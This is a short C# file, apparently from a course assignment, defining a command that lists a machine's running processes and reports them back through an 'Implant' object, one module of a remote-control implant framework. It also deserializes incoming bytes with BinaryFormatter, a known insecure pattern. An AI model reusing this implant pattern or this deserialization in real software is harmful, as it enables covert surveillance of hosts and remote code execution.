using System;
using System.Collections.Generic;
using System.Text;
using System.IO;
using System.Runtime.Serialization.Formatters.Binary;
using System.Diagnostics;
using assignmentObjects; 

namespace assignmentObjects
{
    [Serializable]
    public class ListActiveProcessesCommand:Command
    {
        List<String> processNames;

        public override void execute()
        {
            Console.WriteLine("This is a list a list Active Processes Command");
            Process[] theProcesses = Process.GetProcesses();
            processNames = new List<string>();
            foreach (Process aProcess in theProcesses)
            {
                string processName = aProcess.ToString();
                processNames.Add(processName);
            }

            Implant theimplant = Implant.instance();
            theimplant.sendReply(new ListActiveProcessesReply(processNames));
        }

        public override Command DeSerialize(byte[] theData)
        {
            BinaryFormatter bin = new BinaryFormatter();
            MemoryStream mem = new MemoryStream();
            mem.Write(theData, 0, theData.Length);
            mem.Seek(0, 0);
            return (ListActiveProcessesCommand)bin.Deserialize(mem);
        }
    }

    
}
